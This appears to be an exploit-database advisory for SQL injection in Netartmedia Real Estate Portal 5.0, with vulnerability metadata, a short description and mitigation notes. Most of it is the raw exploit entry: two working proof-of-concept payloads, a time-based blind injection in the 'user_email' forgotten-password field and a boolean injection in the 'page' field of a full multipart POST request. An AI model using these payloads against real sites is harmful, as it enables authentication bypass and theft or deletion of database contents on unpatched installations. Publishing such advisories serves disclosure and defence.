Netartmedia Real Estate Portal 5.0 - Multiple SQL Injection

vendor:

Real Estate Portal

by:

Ahmet Ümit BAYRAM

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Real Estate Portal

Affected Version From: 5.0

Affected Version To: 5.0

Patch Exists: NO

Related CWE: N/A

CPE: a:netartmedia:real_estate_portal:5.0

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Kali Linux

2019

Netartmedia Real Estate Portal 5.0 – Multiple SQL Injection

The real estate portal software is made to be multi-language, the main site can show multiple languages and let the site visitors choose their preferred language. The vulnerability exists due to improper validation of user-supplied input in the 'user_email' and 'page' parameters of the 'index.php' script. A remote attacker can send a specially crafted request with malicious SQL statements to the vulnerable script and execute arbitrary SQL commands in application's database. This can allow the attacker to bypass authentication, access, modify and delete data within the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. The application should also use stored procedures to access the database. Additionally, the application should use a least privileged account with the database.

Source

Exploit-DB raw data:

# Exploit Title: Netartmedia Real Estate Portal 5.0 - Multiple SQL Injection
# Date: 19.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.netartmedia.net/realestate/
# Demo Site: https://www.phpscriptdemos.com/realestate/
# Version: 5.0
# Tested on: Kali Linux
# CVE: N/A
# Description: The real estate portal software is made to be
multi-language, the main site can show multiple languages and let the site
visitors choose their preferred language.

----- PoC 1: SQLi -----

Request: http://localhost/[PATH]/index.php
Parameter: user_email (POST)
Payload:
ProceedSend=1&mod=forgotten_password&user_email=0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z'
OR SLEEP(5)#

----- PoC 2: SQLi -----

Request: http://localhost/[PATH]/index.php
Parameter: MULTIPART page ((custom) POST
Payload:
------WebKitFormBoundaryYUBPFrrBhV4S4pf0
Content-Disposition: form-data; name="SubmitContact"

1
------WebKitFormBoundaryYUBPFrrBhV4S4pf0
Content-Disposition: form-data; name="code"

94102
------WebKitFormBoundaryYUBPFrrBhV4S4pf0
Content-Disposition: form-data; name="email"

sample@email.tst
------WebKitFormBoundaryYUBPFrrBhV4S4pf0
Content-Disposition: form-data; name="message"

20
------WebKitFormBoundaryYUBPFrrBhV4S4pf0
Content-Disposition: form-data; name="name"

${alpharand}
------WebKitFormBoundaryYUBPFrrBhV4S4pf0
Content-Disposition: form-data; name="page"

en_Contact-2228' OR 3801=3801-- eISZ
------WebKitFormBoundaryYUBPFrrBhV4S4pf0
Content-Disposition: form-data; name="phone"

555-666-0606
------WebKitFormBoundaryYUBPFrrBhV4S4pf0
Content-Disposition: form-data; name="subject"

1
------WebKitFormBoundaryYUBPFrrBhV4S4pf0--